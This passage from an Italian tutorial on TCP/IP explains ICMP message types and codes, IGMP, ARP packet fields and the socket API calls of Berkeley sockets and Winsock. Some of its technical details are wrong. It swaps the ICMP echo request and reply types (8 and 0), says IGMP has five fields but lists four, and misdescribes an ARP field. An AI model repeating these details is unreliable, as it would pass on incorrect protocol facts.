problema di routing. Nel primo caso il codice di errore è di host irraggiungibile, mentre nel secondo 
caso viene prodotto un codice di errore di rete irraggiungibile. 

I codici di errore per l'ICMP di tipo 3 sono 16: 


codice 0: rete irraggiungibile 

codice 1: host irraggiungibile 

codice 2: protocollo irraggiungibile 

codice 3: porta irraggiungibile 

codice 4: necessaria frammentazione e disattivazione del bit "don't fragment" 
codice 5: tragitto di origine fallito 

codice 6: rete di destinazione sconosciuta 

codice 7: host di destinazione sconosciuto 

codice 8: host di origine isolato (non più usato) 


codice 9: rete di destinazione vietata dall'amministrazione 

codice 10: host di destinazione vietato dall'amministrazione 

codice 11: rete irraggiungibile per il tipo di servizio (TOS) 

codice 12: host irraggiungibile per il tipo di servizio (TOS) 

codice 13: comunicazione proibita dall'amministrazione tramite filtri 
codice 14: violazione della precedenza da parte dell'host 

codice 15: scorciatoia in vigore 


2) Errori di indirizzamento (tipo 5) 


Essi vengono prodotti dai router. Ogni router di una rete fisica ha il compito di indirizzare i 
pacchetti verso l'hop successivo del percorso, seguendo la via più breve. Esso ha una propria tabella 
di routing in cui vengono memorizzate le informazioni sui percorsi ottimali verso una rete di 
destinazione. La tabella di routing viene costantemente aggiornata mediante un continuo scambio di 
informazioni tra i router. Quando un computer host invia dei dati in rete utilizzando un percorso non 
ottimale, il router che è situato nel primo nodo dove inizia il percorso non ottimale informa l'host di 
ciò con un messaggio di errore di indirizzamento del tipo 5. Questi messaggi di reindirizzamento 
possono essere inviati solo dai router. I codici di errore per gli ICMP di tipo 5 sono 4: 


codice 0: reindirizzamento per rete 
codice 1: reindirizzamento per host 
codice 2: reindirizzamento per tipo di servizio (TOS) e rete 
codice 3: reindirizzamento per tipo di servizio (TOS) e host 


3) Errori di superamento del tempo (tipo 11) 


Gli header dei datagrammi IP contengono un campo che definisce la vita del pacchetto. Questo 
campo è chiamato "time to live" (TTL). Se il TTL raggiunge lo zero, il software di rete scarta il 
pacchetto ed invia all'host sorgente un messaggio di errore. Esistono due codici di errore per questo 
tiipo di messaggio. Il codice 0 indica che il TTL ha raggiunto lo 0 durante il passaggio. In genere 
ciò è dovuto ad un errore nelle tabelle di routing che produce un ciclo di routing, cioè un ciclo di 
loop continui tra due router che si scambiano lo stesso pacchetto, aspettandosi che l'altro router si 
incarichi dell'hop. 

Il codice 1, invece, indica che il timer di riassemblaggio dei frammenti di un host ha raggiunto il 
suo limite prima che tutti i frammenti fossero giunti. Infatti, quando l'host client invia un 
datagramma contenente il flag "More Fragment" settato, l'host di destinazione innesca un timer per 
il riassemblaggio, entro il quale tutti i frammenti devono giungere, pena lo scarto dei frammenti. 


4) errori relativi a problemi dei parametri (tipo 12) 


Questo tipo di errore può essere generato dall'host ogni qualvolta ci sia una condizione di errore 
sconosciuta o quando un datagramma non contiene tutte le informazioni richieste dal protocollo. 
Nel primo caso l'ICMP di tipo 12 avrà il codice 0 ( cattivo header IP), mentre nel secondo caso avrà 
il codice 1 (opzione richiesta mancante) 


5) errori di estinzione della fonte (tipo 4) 
I protocolli orientati alla connessione come TCP contengono un controllo del flusso dei dati, per 


impedire l'intasamento del buffer dell'host server. Un protocollo non orientato alla connessione, 
come IP, è privo di questo controllo del flusso. Poiché i router utilizzano datagrammi IP, senza un 


adeguato controllo del flusso dei dati, essi si potrebbero intasare, congestionando a sua volta il 
traffico di rete. Quando si crea una congestione, i router iniziano a scartare i pacchetti ed inviano 
questo tipo di messaggio di errore, informando l'host mittente che è necessario rallentare la velocità 
del flusso. Questo tipo di ICMP contiene un solo codice, settato a 0. 


MESSAGGI ICMP DI RICHIESTA 


1) Richieste ai router (tipi 9 e 10) 


Come specificato nella RFC 1256, il protocollo ICMP effettua due tipi di richiesta al router: il 
messaggio di sollecito al router (tipo 10) e il messaggio di annuncio del router (tipo 9). 

Innanzi tutto è bene ricordare che lo smistamento dei pacchetti si chiama routing. Gli host preposti 
allo smistamento di questi pacchetti si chiamano router (o anche gateway). Il routing può essere 
diretto od indiretto: nel primo caso il routing avviene tra due host connessi direttamente alla stessa 
rete o sottorete; nel secondo caso, i dati vengono trasmessi ad almeno un router, cioè un host che si 
occupa del successivo smistamento ad un altro router o all'host ricevente. Ogni router ha una sua 
tabella di routing, che non è altro che una tabella, contenente tra le altre cose, una serie di indirizzi 
di destinazioni successive, con a fianco un valore numerico (metrica) che indica la qualità della 
destinazione. La tabella di routing può essere statica e descritta in un file o dinamica. Ora possiamo 
tornare ai messaggi ICMP di richiesta al router. 

Il messaggio di sollecito viene prodotto dall'host al suo avvio, e la risposta del router viene 
chiamato messaggio di annuncio. Il messaggio di annuncio viene utilizzato dall'host per 
inizializzare dinamicamente la propria tabella di routing, in modo da non dover utilizzare un file 
statico come tabella. La particolarità del messaggio di annuncio è che il router può inserire nel 
pacchetto ICMP più di un indirizzo di router. Ogni indirizzo di router è corredato di un campo, 
chiamato Preference Level, che indica all'host ricevente quale router utilizzare per primo o con 
maggior frequenza. Questo pacchetto contiene anche il campo Timelife, che indica il numero di 
secondi per cui l'indirizzo rimane valido, che di norma è di 1800 secondi. 


2) Richieste di timestamp (tipi 13 e 14) 


Questi tipi di richieste permettono di misurare il tempo impiegato dai pacchetti nel passare da un 
host a un altro. Questo datagramma contiene due campi particolari: il campo identificatore ed il 
numero di sequenza. Questi campi vengono utilizzati per distinguerli tra le varie richieste di 
timestamp che, generalmente, vengono utilizzate per analisi statistiche del tempo di trasferimento. 


3) Richieste di maschera di indirizzo (17 e 18) 

La richiesta di maschera di indirizzo viene generalmente utilizzata da una workstation senza disco 
per poter ottenere la propria maschera di sottorete. La richiesta viene effettuata in broadcast e gli 
host in rete risponderanno con un datagramma contenente l'invio della maschera di indirizzo. I 
campi del datagramma ICMP di tipo 17 e 18 sono gli stessi del datagramma timestamp. 


4) Messaggi di richiesta e risposta echo (tipi 0 e 8) 
Questo tipo di messaggio ICMP viene utilizzato da programmi come ping (packet internet grouper) 


per verificare se l'host di destinazione è raggiungibile e per misurare il tempo che la richiesta di 
echo impiega a tornare. L'ICMP di tipo 0 viene inviato dall'applicazione verso l'host di destinazione 


e questi risponde con un messaggio di tipo 8. L'utilizzo di questo tipo di ICMP è utile per la verifica 
della connettività. 

Per la conferma che i protocolli TCP/IP sono stati installati correttamente, generalmente si effettua 
un ping al proprio host, mediante l'utilizzo dell'indirizzo di riciclo o loopback, che è 127.0.0.1. Se il 
pacchetto torna indietro, i protocolli sono installati correttamente. 

Un ping all'indirizzo IP assegnato al proprio host, invece, ci permette di verificare la corretta 
configurazione di questo IP sul proprio host. 

Un ping all'indirizzo IP di gateway predefinito della propria rete, ci permette di verificare la corretta 
configurazione della maschera di sottorete. 

E' evidente che in una buona configurazione dei firewall a filtro di pacchetti, deve essere permessa 
la ricezione di pacchetti ICMP di errore di tipo 3, mentre è utile bloccare gli ICMP di tipo 0 e 8. 


3.2.3 Il protocollo IGMP 


RFC 1112 

Una piccola premessa per ricordare che gli indirizzi IP si distinguono in unicast, broadcast e 
multicast. Gli indirizzi di classe A, B e C si dicono indirizzi unicast, in quanto sono assegnati ad un 
singolo host. 

L'Internet Network Information Center (InterNIC) ha il compito di garantire che ogni rete abbia un 
identificatore univoco. Questo ente utilizza gli indirizzi di classe D per indirizzi di tipo multicast. 


Quando i pacchetti inviati da un host mittente devono raggiungere più host destinatari, si possono 
utilizare due metodi di trasmissione: la trasmissione broadcasting, e la trasmissione multicasting. 


Il metodo broadcasting comporta che il pacchetto di dati venga analizzato da tutti gli host della rete, 
i quali verificheranno che esso non sia destinato a loro. Il problema è che diversi router sono 
configurati per non inoltrare i pacchetti con la modalità broadcasting. 


Il metodo di trasmissione multicasting, invece, permette di specificare come destinazione uno 
specifico gruppo di host, evitando che i pacchetti debbano essere analizzati da tutti i router della 
rete. 

I dati multicast vengono trasmessi mediante datagrammi UDP. 

Gli host possono entrare od uscire dinamicamente da questi gruppi multicast. Quando ne fanno 
parte, assumono degli indirizzi IP di classe D, che vanno da 224.0.0.1 a 239.255.255.255. Se viene 
indicato come destinazione l'indirizzo IP 224.0.0.1, significa che il gruppo broadcast è formato da 
tutti gli host e i router che partecipano a un multicasting IP su una sezione della rete. 

Il pacchetto IGMP è formato da cinque campi. 


- Version: campo che indica la versione del protocollo utilizzato. Con IGMP è settato sul valore di 1 
- Type: può avere due valori; il valore 1 significa che il messaggio IGMP è il prodotto di 
un'interrogazione di un router multicast; il valore impostato a 2 significa che il pacchetto origina da 
una risposta di un host IP 

- Checksum: campo che contiene un valore numerico corrispondente alla somma di controllo, per la 
verifica dell'integrità del dato. 

- Group address: campo che contiene l'IP del gruppo di host multicast. 


Questo tipo di protocollo viene utilizzato generalmente da applicazioni interattive, che permettono 
di fare arrivare le informazioni a più host. 

L'Internet Assigned Number Autority (IANA) assegna alcuni indirizzi multicast come indirizzi noti, 
i quali rappresentano gruppi di host permanenti. 


A causa di un bug nello stack TCP/IP nelle piattaforme win95/98, i pacchetti IGMP frammentati 
possono essere utilizzati per effettuare attacchi D.0.S. 
Recentemente è stata rilasciata dalla Microsoft una patch che risolve il problema. 


3.2.4 Il protocollo ARP 


RFC 826 

L'Address Resolution Protocol è un protocollo che viene utilizzato per risolvere un indirizzo IP di 
un host client nel relativo indirizzo MAC. No, nulla a che vedere con la gloriosa casa Apple. Il 
MAC (media access control) è l'indirizzo fisico dell'host, detto anche indirizzo hardware della 
scheda di rete. 


Il processo in cui opera tale protocollo è il seguente: innanzi tutto il client verificherà se il server fa 
parte della stessa rete o di una rete remota; l'indirizzo IP del server sarà confrontato con la maschera 
di sottorete del client mediante il processo di messa in AND. Gli indirizzi IP dell'origine e della 
destinazione sono confrontati con la maschera di sottorete dell'origine. Se il server si trova nella 
stessa rete avverrà qwuanto segue: l'host client, prima di inviare i dati al server, controlla nella 
propria cache ARP se vi sia l'indirizzo del server. In caso negativo, il client invia un pacchetto ARP 
al server, con il quale chiede l'indirizzo MAC di quest'ultimo. Nel pacchetto, il client inserisce il 
proprio IP e indirizzo MAC, che andranno nella cache ARP del server. Il pacchetto è inviato 
all'indirizzo broadcast e, quindi, a tutti gli host del segmento i quali esamineranno il pacchetto. Gli 
host a cui non è diretto il pacchetto, lo ignoreranno dopo averlo esaminato. L'host a cui è destinato 
il pacchetto, inserirà le informazioni nella propria cache ARP ed invierà il proprio indirizzo MAC 
all'host mittente. Dopo questo passaggio, può avere inizio la comunicazione tra il client ed il server. 


Quando il server si trova in una rete remota, il client controllerà nella propria cache ARP se ha 
l'indirizzo MAC del router predefinito. In caso negativo, esso invierà un pacchetto ARP contenente 
il proprio indirizzo IP e indirizzo MAC, con il quale richiederà l'indirizzo MAC del router. Quindi 
invierà il pacchetto al router. Il processo è identico, da router a router, fino al server. 


Il pacchetto ARP si compone di 9 campi. 


- Hardware type: campo che indica il tipo di hardware usato nella rete 

- Protocol type: campo che indica il tipo di indirizzo di protocollo 

- Hardware address lenght: campo che indica la lunghezza in bit dell'indirizzo hardware 
- Protocol Address Lenght: campo che indica la lunghezza dell'indirizzo di protocollo 

- Op code: campo che indica se il pacchetto è una richiesta od una risposta ARP 

- Sender's hardware Address: campo che indica l'indirizzo hardware dell'host mittente 

- Sender's Protocol Address: campo che indica l'indirizzo IP dell'host mittente 

- Target's Hardware Address: campo che indica l'indirizzo hardware dell'host destinatario 
- Target's Protocol Addres: campo che indica l'indirizzo hardware dellìhost destinatario 


4 Il livello delle applicazioni e i socket 
4.1 Le applicazioni socket 


Immediatamente soprastante a tale livello, nello strato dell'applicazione 


lavorano le applicazioni che si possono suddividere in due categorie: 


- applicazioni socket 
- applicazioni netbios 


Le applicazioni socket sono dei programmi di rete (ftp, telnet ecc.) che 
utilizzano le API socket. 

Le applicazioni NetBios utilizzano altri tipi di API per comunicare e 
condividere i dati tra due host remoti. Questa nota è improntata alla 
descrizione delle applicazioni socket, e quindi non parlerò del NetBios. 


4.1.2 Definizioni 


Socket: quando due host si scambiano dati sulla rete, i due capi in cui 

avviene la comunicazione si dicono punti di arrivo; i socket sono i punti 

di arrivo tra due computer che comunicano in rete. Secondo una convenzione, 
definita modello client-server, i programmi che comunicano in rete, a 

seconda che inviino o ricevino i dati, si distinguono rispettivamente in 
programmi client e programmi server. Pertanto in una comunicazione ci saranno 
due socket, uno nel lato client e uno nel lato server. 

Tecnicamente su usa pure dire che un socket è una rappresentazione astratta 

di un punto di arrivo. 


Le API (Application Program Interface), sono un gruppo di funzioni o 
interfacce software utilizzate dai programmatori per sviluppare applicazioni 
in determinati ambienti. 

L'API socket quindi si può definire come un'interfaccia tra le applicazioni 
che comunicano in rete e lo stack di protocolli TCP-IP. 


4.1.3 Storia del socket 


Ed ora, consentitemi una piccola digressione sull'interfaccia socket. 

Negli anni '80, sull'onda del rapido sviluppo di internet, su richiesta 
dell'ARPA, gli uomini dei laboratori dell'università di Berkeley, 

svilupparono un software particolare che interfacciava tutte le applicazioni 

di rete che giravano sul sistema operativo Unix, con i protocolli TCP-IP. 

Essi progettarono un programma d'interfaccia, denominato API socket, 
chiamato anche socket Berkeley, che si implementava con i protocolli TCP-IP 
su macchine Unix. 


Anche win ha le sue API sockets, chiamate windows sockets o anche winsock. 
Le funzioni del winsock sono praticamente le stesse di quelle dei socket 


Berkeley, ma implementano una serie di funzioni specifiche per l'utilizzo 
sotto windows. Si dice che il winsock è progettato come un componente WOSA 
(Windows Open Service Architecture). 


Nel 1991 nacque il Winsock Group, una società formata da produttori e 
sviluppatori di applicazioni per le reti e di software per sistemi operativi 


windows. Nel 1993 fu prodotto WinSock versione 1.1, che permetteva 
l'utilizzo di applicazioni a 16 bit. Dopo il rilascio di windows 95, sono 
state pubblicate le specifiche delle Windows Sockets versione 2.0, a 32 bit, 
con nuove funzionalità. Oggi siamo alle 2.2. 

Diversamente dalla versione 1.1, che era focalizzata interamente progettato 
sul TCP/IP, la nuova API è indipendente dal protocollo di trasporto. 

Il winsock32.dl] consiste di due interfacce standard , una tra il 

winsock stesso e le Application Programming Interface (API), l'altra tra il 
WinSock e i service providers, Service Providers Interface (SPI). 
All'interno delle Windows Sockets 2 sono inseriti TCP/IP, IPX/SPX, OSI e 
altri protocolli minori. 


4.2 Elementi costitutivi 


4.2.1 Tipi di socket 


Il funzionamento del socket non è particolarmente complesso, ma per capirlo 
ci sono alcuni termini che dovrete memorizzare. 

Ogni socket host è costituito da cinque elementi informativi: il protocollo 
utilizzato, l'indirizzo IP dell'host locale o client, l'indirizzo IP 

dell'host remoto o server, una porta di protocollo per il processo client e 
una porta di protocollo per il processo server. Il protocollo utilizzato, 
permette di distinguere i programmi client o server orientati alla 
connessione o programmi client o server non orientati alla connessione. 

I client o server orientati alla connessione utilizzano un protocollo di 
trasmissione affidabile, come il Tcp, mentre quelli non orientati alla 
connessione si servono di protocolli la cui trasmissione non è garantita, 
come IP e UDP. 


Quanto abbiamo detto sopra, ci permette di distinguere i tipi di 
comunicazione che vengono definiti in tutto dall'interfaccia socket. 


- Comunicazione di rete orientata alla connessione: 

I dati viaggiano in un unico flusso di byte (byte-stream); nel linguaggio 

di programmazione, si dice che l'interfaccia (API) socket utilizza la 
costante simbolica SOCK_STREAM ed si avvale del protocollo TCP. 

- Comunicazione senza connessione: 

I dati viaggiano in pacchi ben distinti (datagrammi). L'API socket utilizza, 


in questo caso, la costante simbolica SOCK_DGRAM e usa il protocollo UDP. 


Oltre ai due tipi di comunicazione sopra descritti, esistono altri tre 
tipi di comunicazione dell'API socket. 


- Comunicazione raw socket: 


Il terzo tipo, più rudimentale, viene chiamato "raw socket", da raw=grezzo. 
L'API socket utilizza la costante simbolica SOCK_RAW. 

Un raw socket viene normalmente utilizzato dal programma per poter adottare 
protocolli diversi da TCP e UDP. 

Nel modello dello stack dei protocollo TCP-IP, è come dire che il raw socket 
mette in comunicazione direttamente il livello delle applicazioni con il 

livello di rete, saltando il livello del trasporto. 

Un esempio di tale tipo di comunicazione è quando un'applicazione crea un 
socket raw per gestire l'ICMP, un protocollo di controllo di basso livello, 

che opera nello strato della rete, come IP e IGMP. 


Per chi si vuole dilettare nella creazione dei pacchetti, è opportuno 

ricordare che i winsock inferiori alla versione 2.0 non contemplano la 
comunicazione raw socket, mentre le versioni successive la supportano con 
diverse limitazioni. Questa limitazione non esiste, invece, per i socket unix 
che utilizzano normalmente i raw socket. Sotto win, un uso meno limitato 
della comunicazione socket raw puo' essere effettuato utilizzando un winsock 
diverso da quello di default fornito dalla Microsoft, ad esempio usando il 
Trumpet Winsock, versione 3.0d che però, a detta di alcuni esperti, rende il 
sistema instabile in alcune situazioni. 


4.2.2 Altri tipi di socket 

Gli ultimi due tipi di socket, sono: 

- socket di pacchetto in sequenza: SOCK_SEQPACKET 

- socket di messaggio consegnato affidabilmente (non implementato): SOCK_RDM. 
Dei due tipi di socket, solo il primo viene utilizzato raramente, mentre il secondo non è 
implementato, e vengono qui citati solo per completezza di esposizione. 

4.3 Funzionamento del socket 

Ora passiamo ad una breve descrizione tecnica di ciò che avviene quando un 
programma comunica con un altro in rete. Credo che ciò sia utile anche per 

chi non si intende di programmazione, se non altro perchè potrà fornirgli 

l'input a sviluppare i concetti qui espressi. 

Per costoro, è utile almeno riassumere quanto segue. 

4.3.1 Definizioni del linguaggio C/C++ 

Nel codice sorgente di un programma possono esistere delle sezioni di codice 


distinte, che sono chiamate funzioni. Le funzioni hanno un nome, un valore o 
argomento e un tipo di restituzione. 


Le funzioni possono essere chiamanti o chiamate. Le funzioni chiamanti 
sospendono l'esecuzione della sezione di codice in esse contenuto in seguito 
ad una chiamata di funzione. Ciò permetterà l'esecuzione della sezione di 
codice della funzione chiamata. Per fare un esempio, un nome di una funzione 
che vedremo più avanti è "socket". I valori (cioè argomenti o chiamati anche 
parametri) della funzione sono facoltativi, e sono indicati all'interno di 

una coppia di parentesi tonde, poste dopo il nome della funzione. 


Nel caso di una chiamata ad una funzione che, ad esempio, ha nome 
"che_palle()", con le parentesi prive di contenuto, avremmo una funzione 
priva di argomenti. Il tipo di restituzione dice al compilatore (programma 
che traduce il sorgente in codice macchina) che tipo di dati la funzione 
chiamata restituisce alla funzione chiamante. 

Variabile: è la rappresentazione che il linguaggio di programmazione usa per 
definire dei dati, che possono essere numeri o stringhe di caratteri. Quando 
ad una variabile non è stato assegnato un valore, si dice che la variabile 

non è stata inizializzata. Ad una stessa variabile possono essere assegnati 
valori diversi. 


Header file o file d'intestazione: è un file che contiene delle definizioni 
d'interfaccia di classe e/o dichiarazioni di funzione. Ha estensione .h. Un 
esempio è il file iostream.h che, tra le altre cose, dice al compilatore come 
utilizzare i comandi di imput ed output (<< >>). Quando nel sorgente l'header 
è compreso in due parentesi acute (<iostream.h>) significa che il file si 

trova nella directory predefinita dal compilatore. Se invece l'header è 
compreso in due doppi apici ("vector.h"), significa che esso si trova nella 
stessa directory del file sorgente. 


Puff, pant. Se volete un corso di C alla Bignami avete sbagliato tutorial ma, 
soprattutto, avete riposto troppa fiducia nell'autore. 


4.4 Le chiamate alle funzioni 


Ora veniamo ai dettagli. Se utilizziamo un programma di rete (browser web, 

ftp), questo viene definito come programma client. 

Quando un programma client vuole comunicare con un programma server in rete, 
il client si limita a creare un'interfaccia socket, chiamando la funzione 

"socket()", con tre parametri: int socket( int famiglia, int tipo, int 

protocollo ). 


A questo punto, l'applicazione, prima di poter utilizzare il socket creato, 
deve prima configurarlo nella giusta maniera. Se ricordate ciò che abbiamo 
detto più sopra, possiamo raggruppare i socket in due tipi principali: 

quelli connessi e quelli non connessi. Il metodo di configurazione, pertanto, 
varia a seconda del tipo di socket. 


4.5 Comunicazione di rete orientata alla connessione 


Se il programma client utilizza il protocollo TCP si dice che è orientato 


alla connessione. L'applicazione crea inizialmente un socket, con la chiamata alla omonima 
funzione. Per la configurazione del socket, il programma chiama una 

seconda funzione, definita "connect()". Ma procediamo con ordine e vediamo come sono strutturate 
le funzioni chiamate. 


4.5.1 Funzione Socket() 


La funzione socket contiene i parametri che specificano la famiglia di 
protocolli (protocol_family), il tipo di socket (socket_type) e il protocollo 
utilizzato (protocol_type). 


Definiamo i tre parametri. 


Protocol_family: l'interfaccia socket puo effettuare comunicazioni su più 
tipi di reti e, quindi, può utilizzare diversi protocolli come TCP/IP, XNS 

ed i protocolli interni di unix. XNS è uno stack di protocolli simile a 
TCP/IP, sviluppato dai laboratori Xerox, che viene implementato nelle reti 
Netware di Nowell e VINES di Banyan. Questo parametro comprende quindi delle 
costanti simboliche per definire la famiglia di protocolli supportata. 

Quella utilizzata per le comunicazioni internet è la costante simbolica 
PF_INET, che identifica lo stack TCP/IP. PF_UNIX identifica la famiglia di 
protocolli interni di unix, i quali vengono utilizzati per le comunicazioni 
interne tra i vari processi del s.0.; PF_NS identifica la famiglia di 

protocolli XEROX. Quando il parametro identifica non le famiglie di 
protocolli, ma le famiglie di indirizzi, i quali variano da rete a rete, esso 
utilizza le stesse costanti simboliche con il prefisso AF_ al posto di PF. 
Pertanto avremo AF_INET, AF_UNIX e AF_NS. 


Socket_type: come abbiamo già visto esistono cinque tipi di socket, dei quali 

solo tre sono comunemente implementati: SOCK_STREAM, che indica che verrà 
utilizzato la comunicazione byte stream; SOCK_DGRAM che indica che verrà 
utilizzata la comunicazione con invio di datagrammi; SOCK_RAW, che indica che 
verrà utilizzato un protocollo di basso livello, come ICMP e IGMP. 


Protocol_type: la costante simbolica viene specificata con un prefisso 
IPPROTO_ seguita dal tipo di protocollo: ad es. IPPROTO_UDP, IPPROTO_ TCP ecc. 


4.5.2 Funzione connect() 


Questa funzione contiene tre parametri: socket_handle, remote_socket_address 
e address_lenght. 

Come si può notare, anche intuitivamente, dai nomi dei parametri, è' la 
funzione connect a memorizzare le informazioni del punto di arrivo locale e 

di quello remoto. 

In questo caso, il protocollo utilizzato permette una connessione diretta 

con il server, attraverso l'invio di dati byte-stream. 


Anche il programma server, dopo un procedimento analogo di creazione del 
socket, chiama alcune funzioni: 


4.5.3. Funzione bind() 


La prima, relativa alla configurazione delle informazioni 

locali, è chiamata funzione "bind()"; il socket del server viene informato 
su quale porta deve stare in ascolto da questa funzione. 

Una piccola digressione sulla funzione bind(). La chiamata a bind può essere 
utilizzata in 3 modi diversi: 

1. I server registrano il loro indirizzo, ben noto, nel sistema. 

In pratica dicono al sistema: "Questo è il mio indirizzo e qualsiasi 
messaggio ricevuto ad esso indirizzato deve essere consegnato a me!". 
Questa procedura deve essere fatta prima di accettare richieste da un client 
sia dai server orientati alla connessione sia da quelli che non lo sono. 

2. Un client può registrare un indirizzo specifico per se stesso, in modo che 
il server risponda alle richieste su quel indirizzo. 

3. Un client senza connessione deve accertarsi che il sistema assegni un 
certo indirizzo unico, affinchè l'altra estremità abbia un indirizzo di 
ritorno valido su cui inviare le risposte. 

Terminata la digressione, definiamo i parametri. 

I parametri sono: ( int sockfd, struct sockaddr*mioindir, int lunghindr). 

1. sockfd: descrittore di socket precedentemente creato con la chiamata di 
sistema socket. 

2. mioindr: è un puntatore all'indirizzo specifico della struttura del 
protocollo. 

3. lunghdir: dimensione della struttura del protocollo. 


Come? Ah, c'è qualcuno che non conosce le definizioni descrittore e 
puntatore? 


Puntatore: è un indirizzo di memoria associato ad un tipo di dato, dove 
l'associazione viene indicata con il simbolo *. Es: Tipo_di_dato*puntatore 


Descrittore: E' un tipo particolare di puntatore. In C, uno dei modi per 
manipolare il contenuto di un file consiste nell'aprire uno stream, cioè un 
"canale di flusso" col file stesso mediante un'apposita funzione, che 
restituisce il puntatore ad una struttura i cui campi sono utilizzati poi da 
altre funzioni, per compiere operazioni sul file stesso. Tale puntatore è 
detto "descrittore" del file. 

Se qualcuno non ha capito nulla, ecco un altro esempio di ripasso: 
(Borland C++ 3 ed. Apogeo, lire 64 mila)*puntatore. 


Le altre due chiamate, relative alle informazioni remote sono le funzioni 
"listen()" e "accept()". 


4.5.4 Funzione listen() 


Questa chiamata di sistema è usata da un server orientato alla connessione 
per indicare che è disposto a ricevere le connessioni, cioè si trova in stato 
di attesa. 

Solitamente è eseguita dopo le chiamate di sistema socket e bind ed 
immediatamente prima della chiamata accept. Quando arrivano più richieste di 
connessione, il server usa la funzione listen() per gestire le richieste 
multiple e simultanee per il socket. 

I parametri sono: int listen( int sockfd, int backlog ); 

1. sockfd: descrittore di socket precedentemente creato con la chiamata di 
sistema socket. 

2. backlog: specifica il numero di richieste di connessione che possono 
essere accodate dal sistema mentre è in attesa che il server esegua la 
chiamata accept. 


4.5.5 Funzione accept() 


Dopo che un server orientato alla connessione ha eseguito 

la chiamata di sistema listen, si pone in attesa di una eventuale connessione 
da parte di un processo client. 

La chiamata accept prende in esame la richiesta di connessione che si ha in 
testa alla coda specificata dalla listen e crea un altro socket con le stesse 
propietà di socketfd. 

Se non ci sono richieste di connessione in sospeso, questa chiamata blocca 
il chiamante finche non ne arriva una. 

Le funzioni sono: int accept( int sockfd, struct sockaddr *pari, 

int lunghindir); 

1. sockfd: Descrittore di socket fd. 

2. lunghindr:Contiene la lunghezza della struttura dell'indirizzo del 
processo connesso (client). Il lunghindir viene prima posto uguale alla 
dimensione della struttura e succesivamente prende il valore della dimensione 
della struttura effetivamente occupata dal client connesso. 


Il programma client, per instaurare la classica trasmissione handsnake a tre 
vie, a sua volta chiamerà la funzione "write()" per trasmettere i dati e la 
funzione "read()" per ricevere i dati di risposta a una porta specifica che 
verranno inviati dal server. 

A questo punto, il server chiamerà anch'esso le funzioni read() e write(), 
rispettivamente per ricevere e rispondere. 


4.6 Comunicazione di rete non orientata alla connessione 


Se il programma client non è orientato alla connessione, per configurare le 
informazioni locali esso chiama la funzione "bind" e la funzione "sendto" 
per la configurazione delle informazioni remote. Dato che il socket è senza 
connessione, non viene effettuata la chiamata alla funzione connect. 

A sua volta, il programma server senza connessione ascolterà passivamente 
i dati che giungeranno dalla porta di protocollo e chiamerà la funzione 


"bind" per le informazioni locali e la funzione "recvfrom" per le 
informazioni remote. Quando giungeranno i dati dal client, il server 
trasmetterà dati in risposta con la stessa funzione sendto ed il client 

riceverà tali dati utilizzando la chiamata alla funzione recvfrom (invece di 
recv o read), esattamente come avviene nel server. 

In questo tipo di comunicazione, il protocollo utilizzato non permette una 
connessione diretta tra il programma client ed il programma server, cioè una 
connessione detta point-to-point tra due punti di arrivo. 

Come abbiamo già visto, i dati vengono trasmessi mediante l'uso dei 
datagrammi. 


4.7 Riepilogo 


Ricapitolando, terminata la fase della configurazione, durante la 
trasmissione dei dati l'API del socket chiamerà cinque diverse funzioni: 
send, write, writev, sendto e sendmsg. 


Le prime tre funzioni sono utilizzate solo da socket orientati alla 

connessione. 

In particolare, la funzione send contiene quattro parametri e contiene alcuni 
flag particolari usati per controllare il socket (socket_handle, 

message buffer, buffer_lenght e special_flags). La funzione write trasmette 

i dati utilizzando un semplice buffer e contiene generalmente tre funzioni 
(socket_handle, message _buffer e buffer_lenght). La funzione writev trasmette 
i dati utilizzando memoria non contigua come buffer per i dati e contiene tre 
funzioni (socket_handle, io_vector e vector_lenght). 


Le ultime due funzioni vengono usate dall'API del socket non connesso. 

In particolare, la funzione sendto utilizza un semplice buffer per i messaggi 
e contiene sei parametri (socket_handle, message_buffer, buffer_lenght, 
special_flags, socket_address_structure e address_structure_lenght). 

La funzione sendmsg trasmette i dati utilizzando una struttura dei messaggi 
flessibile come buffer dei dati e contiene tre parametri (socket_handle, 
message_structure e special_flags). 


Ecco uno specchietto con le corrispondenze tra le funzioni di trasmissione e 
le funzioni di ricezione nell'API socket: 


funzione di trasmissione / funzione di ricezione 


- send recv 

- write read 

- writev readv 

- sendto recvfrom 
- sendmsg recvmsg 


Ed ecco pure uno specchietto delle varie chiamate dei due tipi di socket: 


- socket con protocollo orientato alla connessione 


Server=socket-bind-listen-accept--read-write 


Client=socket-connect-write-read 
- socket con protocollo non orientato alla connessione 


Server=socket-bind-recvfrom--sendto 


Client=socket-bind-sendto-recvfrom 
A tutte le funzioni sopra espresse, bisogna aggiungere un'ultima funzione: 


Select(): è solitamente usata dai programmi server o da programmi client 
particolarmente sofisticati e permette ad un singolo progesso di verificare 
lo stato di più socket. Richiede cinque parametri e sono: 
select(number_sockets, readable_sockets, writeable_sockets, error_sockets, 
max_time). 


4.8. Il winsock 


Non ci sono grandi differenze di caratteristiche tra il socket Berkeley e il 
Winsock. Le principali sono: 


1. Il socket windows implementa l'A PI del socket in una libreria con 
estensione dll, chiamata winsock.dll. 

2. Winsock, oltre alle funzioni già definite con il socket Berkeley, 
richiede sempre la chiamata a due funzioni specifiche: WSAStartup e 
WSACleanup. WSAStartup() è una funzione chiamata dal programma durante una 
negoziazione tra il programma stesso e winsock.dll. Il programma specifica 
le caratteristiche minime richieste al winsock ed il winsock risponde 
specificando le proprie funzionalità. In pratica questa funzione serve al 
programma per specificare quale versione dell'API winsock necessita. 
WSAStartup può essere chiamata diverse volte durante l'attività del 
programma, ad esempio per fornire le caratteristiche dell'implementazione. 
A ogni chiamata viene incrementato un contatore delle chiamate. 
WSACIleanup() è una funzione che viene chiamata dal programma per 
decrementare il contatore delle chiamate alla funzione WSAStartup. 

3. In un errore nel socket, l'API Berkeley utilizza la funzione errno() con 
il valore a -1, mentre il winsock definisce una nuova costante, chiamata 
Socket_Error, il cui valore è -1; il programma chiamerà quindi la funzione 
WSAGetLastError, che verificherà la causa che ha provocato l'errore nel 
winsock. 

4. A differenza di quanto avviene con i programmi unix, che necessitano di 
più file header, nei programmi per Windows l'unico file da includere per 
il supporto dei socket e' winsock.h sia per la versione a 16 che per 
quella a 32 bit. L'header winsock.h include automaticamente windows.h e, 
pertanto, non sarà necessario inserirlo. In fase di compilazione si 
scegliera' (automaticamente o manualmente) la dll da usare. 


5 CONCLUSIONE 


Ora è ovvio che chi non conosce l'arte della programmazione, più in là non 

può andare. Memorizzare le varie funzioni chiamate da un programma durante lo 

